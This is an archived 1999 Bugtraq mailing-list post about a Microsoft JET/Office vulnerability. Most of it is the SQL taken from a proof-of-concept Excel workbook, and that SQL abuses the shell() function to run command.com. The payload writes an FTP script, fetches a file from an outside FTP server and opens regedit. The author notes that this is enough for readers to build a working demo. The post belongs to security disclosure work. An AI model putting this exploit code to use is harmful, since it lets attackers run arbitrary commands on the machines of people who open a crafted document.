[11452] in bugtraq
Microsoft JET/Office Vulnerability Exploit
daemon@ATHENA.MIT.EDU (Ollie Whitehouse)
Sat Aug 21 01:35:37 1999
Mime-Version: 1.0
Content-Type: text/plain
Message-Id: <E153A2F0408CD111955000A0C9609C083BA942@exchange.servers.delphis.net>
Date: Thu, 19 Aug 1999 12:27:01 +0100
Reply-To: Ollie Whitehouse <ollie@DELPHISPLC.COM>
From: Ollie Whitehouse <ollie@DELPHISPLC.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
All,
Russ Cooper:
> Well, with the module password protected it seems clear you're not out
> to get that critique very quickly. Maybe if you'd let someone know the
> details we'd be able to answer you. As it is, we're simply left with
> what appears to be the same exploit.
Below is the code from the workbook:
[Code]
SELECT shell('command.com /C echo user anonymous
yeah@right.com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
[RAW Dump from the workbook from the SF web site]
SELECT shell('command.com /C echo user anonymous
yeah@right.com'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit >
c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
config.......DBQ=C:\;DefaultDir=C:\;Driver={Microsoft Text Driver (*.txt;
*.csv)};DriverId=27;Extensions=asc,csv,ini,tab,txt;FIL=text;Implic..}.z..itC
ommitSync=Yes;MaxBufferSize=512;MaxScanRows=25;PageTimeout=5;SafeTransaction
s=0;Threads=3;UID=admin;UserCommitSync=Yes
That will be enough information for people who want to create their own
working demo.
Ollie
<%
Ollie Whitehouse
I.T Co-Ordinator - Delphis Consulting
VOX : +44 (0)207 916 0200 (Switchboard)
FAX : +44 (0)207 916 1620 (Main)
FAX : +44 (0)870 0881837 (FAX - E-Mail)
PGP : http://www.ombs.demon.co.uk/pgp.txt
Tag : Who needs Windows2000 when you have OS/2?
%>
